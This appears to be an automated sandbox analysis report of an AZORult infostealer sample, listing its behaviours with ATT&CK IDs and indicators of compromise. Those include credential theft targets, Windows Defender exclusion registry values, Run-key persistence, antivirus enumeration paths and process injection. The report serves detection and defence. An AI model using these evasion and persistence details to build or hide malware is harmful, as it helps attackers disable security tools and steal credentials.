azorult | 35eba77b7b355012b84ef6b1b20a152be27c0e693759175ac1bee6ee318b4e4c

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	rubntndbxig.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	UJ1IDMLY3.exe

Loads dropped DLL 63 IoCs

pid	Process
4864	p40qzszkupa.tmp
4144	Setup3310.tmp
4144	Setup3310.tmp
4120	vict.tmp
4456	IBInstaller_97039.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4280	vpn.tmp
4536	rubntndbxig.tmp
4536	rubntndbxig.tmp
4536	rubntndbxig.tmp
4536	rubntndbxig.tmp
4536	rubntndbxig.tmp
4536	rubntndbxig.tmp
4536	rubntndbxig.tmp
2568	Setup.tmp
2568	Setup.tmp
4436	app.exe
5576	Delta.tmp
5576	Delta.tmp
4492	Setup.exe
4492	Setup.exe
4692	mask_svc.exe
4692	mask_svc.exe
4692	mask_svc.exe
4692	mask_svc.exe
4692	mask_svc.exe
4692	mask_svc.exe
4280	vpn.tmp
4280	vpn.tmp
1120	patch.exe
1120	patch.exe
1120	patch.exe
5628	PictureLAb.tmp
5628	PictureLAb.tmp
4408	Setup.tmp
1120	patch.exe
5892	MaskVPNUpdate.exe
5892	MaskVPNUpdate.exe
2920	software_reporter_tool.exe
2920	software_reporter_tool.exe
2920	software_reporter_tool.exe
2920	software_reporter_tool.exe
2920	software_reporter_tool.exe
2920	software_reporter_tool.exe
2920	software_reporter_tool.exe
6852	vict.tmp
152	Setup3310.tmp
152	Setup3310.tmp
6864	Setup.tmp
6864	Setup.tmp
6692	Delta.tmp
6692	Delta.tmp
3900	Setup.exe
3900	Setup.exe
1820	PictureLAb.tmp
1820	PictureLAb.tmp
4728	Setup.tmp

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Windows security modification 2 TTPs 10 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\FragrantGlitter = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\app.exe = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	app.exe

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\PMB61253Y6F05R4 = "\"C:\\Program Files\\UJ1IDMLY3E\\UJ1IDMLY3.exe\""	UJ1IDMLY3.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"	gcttt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\FragrantGlitter = "\"C:\\Windows\\rss\\csrss.exe\""	app.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\MaskVPN\\Vonaedydufe.exe\""	RAsh.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\qlgeldxw5oc = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\FU8819PNUA\\multitimer.exe\" 1 3.1615959302.605195064eecf"	multitimer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\6866006 = "\"C:\\Users\\Admin\\AppData\\Roaming\\cseaz4kjohk\\rubntndbxig.exe\" /VERYSILENT"	rubntndbxig.tmp

Checks for any installed AV software in registry 1 TTPs 53 IoCs

Security Software Discovery

T1063

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\FRISK Software\F-PROT Antivirus for Windows	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\IKARUS\anti.virus	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\G Data\AntiVirenKit	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\KasperskyLab	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Fortinet\FortiClient\installed	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet\Services\MBAMProtector	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Bitdefender\QuickScan	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Avira\Antivirus	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVG\AV	multitimer.exe
Key opened	\REGISTRY\MACHINE\Software\Avira\Antivirus	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\BullGuard Ltd.\BullGuard\Main	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Sophos	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\TrendMicro\UniClient	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AntiVirService	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Vba32\Loader	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\K7 Computing\K7TotalSecurity	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\ArcaBit	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\McAfee\DesktopProtection	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Jiangmin\ComputerID	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVG\AV	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version	multitimer.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md2_2efs.exe

Drops Chrome extension 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\colgdlijdieibnaccfdcdbpdffofkfeb\6.37.18_0\manifest.json	askinstall24.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 24 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
91	ipinfo.io
193	ip-api.com
46790	checkip.dyndns.org
48706	ip.anysrc.net
63125	ipinfo.io
69782	ipinfo.io
80034	checkip.dyndns.org
137331	checkip.amazonaws.com
138368	checkip.dyndns.org
149345	checkip.amazonaws.com
161114	checkip.amazonaws.com
167573	checkip.amazonaws.com
59846	checkip.amazonaws.com
72604	checkip.amazonaws.com
73331	ip-api.com
124080	checkip.amazonaws.com
283	ip-api.com
85202	checkip.amazonaws.com
123067	ip.anysrc.net
49	api.ipify.org
148	checkip.amazonaws.com
75893	checkip.dyndns.org
97835	checkip.amazonaws.com
110493	checkip.amazonaws.com

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	multitimer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	multitimer.exe

Drops file in System32 directory 17 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\DriverStore\Temp\{597fc622-6198-4840-8834-ab560943e817}\oemvista.inf	DrvInst.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{597fc622-6198-4840-8834-ab560943e817}\SETFA82.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{597fc622-6198-4840-8834-ab560943e817}\tap0901.cat	DrvInst.exe
File created	C:\Windows\System32\DriverStore\Temp\{597fc622-6198-4840-8834-ab560943e817}\SETFA83.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{597fc622-6198-4840-8834-ab560943e817}\SETFA94.tmp	DrvInst.exe
File created	C:\Windows\System32\DriverStore\drvstore.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{597fc622-6198-4840-8834-ab560943e817}	DrvInst.exe
File created	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF	tapinstall.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{597fc622-6198-4840-8834-ab560943e817}\SETFA83.tmp	DrvInst.exe
File created	C:\Windows\System32\DriverStore\Temp\{597fc622-6198-4840-8834-ab560943e817}\SETFA94.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{597fc622-6198-4840-8834-ab560943e817}\tap0901.sys	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf	DrvInst.exe
File created	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF	DrvInst.exe
File created	C:\Windows\System32\DriverStore\Temp\{597fc622-6198-4840-8834-ab560943e817}\SETFA82.tmp	DrvInst.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

pid	Process
5960	mask_svc.exe
5676	mask_svc.exe
4692	mask_svc.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 2052 set thread context of 1312	2052	key.exe	89
PID 4480 set thread context of 4600	4480	6A97.tmp.exe	104
PID 5532 set thread context of 5856	5532	3tz26HrLg.exe	155
PID 5656 set thread context of 5128	5656	QbfCCamg6.exe	156

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\MaskVPN\is-OJ0RR.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-99O90.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\unins000.dat	vpn.tmp
File created	C:\Program Files (x86)\Shy-Thunder\7za.dll	app.exe
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Studio.Delphi.dll	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Studio.Host.dll	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\am805.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-8BA1G.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\Shy-Thunder\winamp.exe	7za.exe
File opened for modification	C:\Program Files (x86)\MaskVPN\version	MaskVPNUpdate.exe
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\unins000.dat	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\libeay32.dll	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-MJNIU.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\Picture Lab\SourceGrid2.dll	prolab.tmp
File created	C:\Program Files (x86)\Shy-Thunder\NalDrv.sys	app.exe
File created	C:\Program Files (x86)\MaskVPN\Vonaedydufe.exe	RAsh.exe
File opened for modification	C:\Program Files (x86)\viewerise\unins000.dat	p40qzszkupa.tmp
File created	C:\Program Files (x86)\MaskVPN\is-VDSRT.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-280CM.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\Shy-Thunder\help.txt	app.exe
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe	vpn.tmp
File opened for modification	C:\Program Files (x86)\Picture Lab\AForge.dll	prolab.tmp
File opened for modification	C:\Program Files (x86)\Picture Lab\unins000.dat	prolab.tmp
File created	C:\Program Files (x86)\Picture Lab\is-4IJ95.tmp	prolab.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-38NL0.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\is-DCQAD.tmp	vpn.tmp
File created	C:\Program Files\UJ1IDMLY3E\uninstaller.exe	enoflseyeow.exe
File opened for modification	C:\Program Files (x86)\Shy-Thunder\app.exe	app.exe
File created	C:\Program Files (x86)\Picture Lab\is-P86C8.tmp	prolab.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-JJ0K5.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\Shy-Thunder\winamp.7z	app.exe
File created	C:\Program Files (x86)\viewerise\is-RA8L8.tmp	vict.tmp
File created	C:\Program Files (x86)\viewerise\is-9AV5T.tmp	vict.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\tunnle.dll	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\winxp32\devcon.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-06NQ0.tmp	vpn.tmp
File created	C:\Program Files (x86)\viewerise\unins000.dat	p40qzszkupa.tmp
File opened for modification	C:\Program Files (x86)\Picture Lab\Pictures Lab.exe	prolab.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-S9DQB.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\MaskVPN.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-S7H11.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\ServiceModelInstallRC.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\Shy-Thunder\7zxa.dll	app.exe
File created	C:\Program Files (x86)\Picture Lab\is-63OS5.tmp	prolab.tmp
File created	C:\Program Files (x86)\Shy-Thunder\winamp-plugins.7z	app.exe
File created	C:\Program Files (x86)\MaskVPN\Vonaedydufe.exe.config	RAsh.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\debug.log	chrome.exe
File opened for modification	C:\Program Files (x86)\MaskVPN\ssleay32.dll	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-QQ04K.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-JHVUQ.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-QRDM0.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-R1MFD.tmp	vpn.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-RQ5KN.tmp	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\polstore.dll	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-9PJUM.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-SOG95.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\viewerise\unins000.dat	vict.tmp
File created	C:\Program Files (x86)\MaskVPN\is-QQT98.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-RIAK3.tmp	vpn.tmp
File created	C:\Program Files (x86)\Picture Lab\is-RNAM1.tmp	prolab.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-R7LDL.tmp	vpn.tmp
File created	C:\Program Files (x86)\Shy-Thunder\help.txt	app.exe
File created	C:\Program Files (x86)\Shy-Thunder\WinmonProcessMonitor.sys	7za.exe
File opened for modification	C:\Program Files (x86)\Picture Lab\AForge.Imaging.dll	prolab.tmp

Drops file in Windows directory 15 IoCs

description	ioc	Process
File created	C:\Windows\inf\oem2.inf	DrvInst.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	DrvInst.exe
File opened for modification	C:\Windows\inf\oem2.inf	DrvInst.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	svchost.exe
File opened for modification	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\rss	app.exe
File created	C:\Windows\rss\csrss.exe	app.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	multitimer.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	multitimer.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	tapinstall.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	DrvInst.exe
File created	C:\Windows\INF\oem2.PNF	DrvInst.exe
File created	C:\Windows\windefender.exe	csrss.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
1864	3448	WerFault.exe	382
6824	6360	WerFault.exe	388

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Capabilities	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags	tapinstall.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs	tapinstall.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	tapinstall.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064	svchost.exe
